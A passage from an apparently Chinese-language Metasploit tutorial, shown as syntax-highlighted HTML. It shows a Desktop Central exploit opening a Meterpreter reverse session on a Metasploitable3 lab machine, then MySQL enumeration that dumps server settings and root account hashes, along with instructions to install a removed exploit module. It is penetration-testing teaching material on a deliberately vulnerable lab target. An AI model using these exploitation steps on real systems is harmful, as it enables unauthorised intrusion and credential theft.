class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Uploading<\/span> <span class=\"hljs-string\">JSP<\/span> <span class=\"hljs-string\">stager<\/span> <span class=\"hljs-string\">uBzAP.jsp...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Executing<\/span> <span class=\"hljs-string\">stager...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">http:\/\/192.168.177.143:8080<\/span> <span class=\"hljs-string\">handling<\/span> <span class=\"hljs-string\">request<\/span> <span class=\"hljs-string\">from<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">;<\/span> <span class=\"hljs-string\">(UUID:<\/span> <span class=\"hljs-string\">tsqgh8zb)<\/span> <span class=\"hljs-string\">Staging<\/span> <span class=\"hljs-string\">x86<\/span> <span class=\"hljs-string\">payload<\/span> <span class=\"hljs-string\">(180825<\/span> <span class=\"hljs-string\">bytes)<\/span> <span class=\"hljs-string\">...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-string\">*<\/span>] <span class=\"hljs-string\">Meterpreter<\/span> <span class=\"hljs-string\">session<\/span> <span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:8080<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><span class=\"hljs-string\">:49632)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-26 17:39:09<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-type\">!]<\/span> <span class=\"hljs-string\">This<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">may<\/span> <span class=\"hljs-string\">require<\/span> <span class=\"hljs-string\">manual<\/span> <span class=\"hljs-string\">cleanup<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">'..\/webapps\/DesktopCentral\/jspf\/uBzAP.jsp'<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">target<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt; <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt; getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Server username: NT AUTHORITY\\LOCAL SERVICE<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt; sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Computer : METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">OS : Windows 2008 R2 (Build 7601, Service Pack 1).<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Architecture : x64<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">System Language : en_US<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Domain : WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Logged On Users : 2<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Meterpreter : x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter &gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<h4 class=\"heading\">5\u3001\u5229\u7528\u516c\u7528\u670d\u52a1<\/h4>\n<p>\u5728\u6f0f\u6d1e\u653b\u51fb\u65f6\uff0c\u6709\u4e9b\u670d\u52a1\u8ddf\u76ee\u6807\u4e0a\u5176\u4ed6\u5927\u90e8\u5206\u670d\u52a1\u90fd\u6709\u5173\u7cfb\uff0c\u800c\u5927\u591a\u6570\u662f\u60c5\u51b5\u4e0b\u5b83\u4eec\u88ab\u5ffd\u89c6\u4e86\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p>\u5728\u672c\u8282\u4e2d\uff0c\u6211\u4eec\u5c06\u5229\u7528\u76ee\u6807\u73af\u5883\u4e2d\u6700\u5e38\u89c1\u548c\u6700\u5bb9\u6613\u88ab\u6ee5\u7528\u7684\u670d\u52a1-<code>Mysql<\/code>\u3002\u5927\u591a\u6570\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528<code>Mysql<\/code>\u670d\u52a1\uff0c\u56e0\u4e3a\u5b83\u4eec\u662f\u51fa\u4e8e\u5f00\u53d1\u76ee\u7684\u5b89\u88c5\u7684\u3002\u5ffd\u7565\u4e86\u4e00\u4e9b\u5b89\u5168\u52a0\u56fa\u3002\u6bd4\u5982\u8bbe\u7f6e<code>root<\/code>\u5bc6\u7801\u6216\u8005\u8bbe\u7f6e\u5f3a\u5bc6\u7801\u3002<\/p>\n<p>\u672c\u8282\u6211\u4eec\u5c06\u4f7f\u7528<code>Metasploitable3<\/code>\u4f5c\u4e3a\u9776\u673a<\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>\u8981\u5229\u7528\u76ee\u6807\u7684<code>Mysql<\/code>\u670d\u52a1\uff0c\u6211\u4eec\u5148\u4f7f\u7528<code>MySQL<\/code>\u679a\u4e3e\u6a21\u5757\u679a\u4e3e\u76ee\u6807\uff0c\u7136\u540e\u4f7f\u7528<code>Oracle MySQL for the Microsoft Windows Payload<\/code>\u653b\u51fb\u6a21\u5757\u83b7\u53d6\u8fdc\u7a0b\u4e3b\u673a\u7684<code>shell<\/code>\u3002<\/p>\n<p>TIP\uff1a<code>mysql_paylod<\/code>\u6a21\u5757\u5728\u65b0\u7248\u7684<code>Metasploit<\/code>\u4e2d\u88ab\u79fb\u9664\u4e86\u3002\u4e0d\u8fc7\u4f60\u53ef\u4ee5\u4ece\u00a0<code>https:\/\/www.exploit-db.com\/download\/16957<\/code>\u4e0b\u8f7d\u8fd9\u4e2a\u6a21\u5757\uff0c\u653e\u5230<code>Metasploit<\/code>\u5bf9\u5e94\u7684\u6a21\u5757\u76ee\u5f55\u4e2d(<code>\/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/mysql<\/code>)\uff0c\u4fee\u6539\u4ee3\u7801\u7684\u524d\u9762\u51e0\u884c\u4e3a\u5982\u4e0b\u5185\u5bb9\u5c31\u884c\u3002<\/p>\n<pre><code class=\"hljs linux copyable ruby\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\">## <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $ <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\">## <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\">## <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># This file is part of the Metasploit Framework and may be subject to <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># redistribution and commercial restrictions. Please see the Metasploit <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># Framework web site for more information on licensing and terms of use. <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># http:\/\/metasploit.com\/framework\/ <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\">## <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">require<\/span> <span class=\"hljs-string\">'msf\/core'<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-class\"><span class=\"hljs-keyword\">class<\/span> <span class=\"hljs-title\">MetasploitModule<\/span> &lt; Msf::Exploit::<span class=\"hljs-title\">Remote<\/span> <\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Rank = ExcellentRanking<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">include<\/span> Msf::Exploit::Remote::MYSQL<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">include<\/span> Msf::Exploit::CmdStager<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable ruby\"><\/code><\/pre>\n<p>\u679a\u4e3e\uff1a<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 auxiliary(admin<span class=\"hljs-regexp\">\/mysql\/<\/span>mysql_enum) &gt; use auxiliary<span class=\"hljs-regexp\">\/admin\/<\/span>mysql\/mysql_enum<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 auxiliary(admin<span class=\"hljs-regexp\">\/mysql\/<\/span>mysql_enum) &gt; set RHOSTS <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">RHOSTS =&gt; <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 auxiliary(admin<span class=\"hljs-regexp\">\/mysql\/<\/span>mysql_enum) &gt; set USERNAME root<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">USERNAME =&gt; root<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 auxiliary(admin<span class=\"hljs-regexp\">\/mysql\/<\/span>mysql_enum) &gt; run<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Running module against <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Running MySQL Enumerator...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Enumerating Parameters<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - MySQL <span class=\"hljs-attr\">Version:<\/span> <span class=\"hljs-number\">5.5<\/span><span class=\"hljs-number\">.20<\/span>-log<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Compiled <span class=\"hljs-keyword\">for<\/span> the following <span class=\"hljs-attr\">OS:<\/span> Win64<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">Architecture:<\/span> x86<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Server <span class=\"hljs-attr\">Hostname:<\/span> metasploitable3<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Data <span class=\"hljs-attr\">Directory:<\/span> <span class=\"hljs-attr\">c:<\/span>\\wamp\\bin\\mysql\\mysql5<span class=\"hljs-number\">.5<\/span><span class=\"hljs-number\">.20<\/span>\\data\\<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Logging of queries and <span class=\"hljs-attr\">logins:<\/span> OFF<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Old Password Hashing Algorithm OFF<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Loading of local <span class=\"hljs-attr\">files:<\/span> ON<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Deny logins with old Pre<span class=\"hljs-number\">-4.1<\/span> <span class=\"hljs-attr\">Passwords:<\/span> OFF<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Allow Use of symlinks <span class=\"hljs-keyword\">for<\/span> Database <span class=\"hljs-attr\">Files:<\/span> YES<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Allow Table <span class=\"hljs-attr\">Merge:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - SSL <span class=\"hljs-attr\">Connection:<\/span> DISABLED<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Enumerating <span class=\"hljs-attr\">Accounts:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - List of Accounts with Password <span class=\"hljs-attr\">Hashes:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost Password <span class=\"hljs-attr\">Hash:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span> Password <span class=\"hljs-attr\">Hash:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div 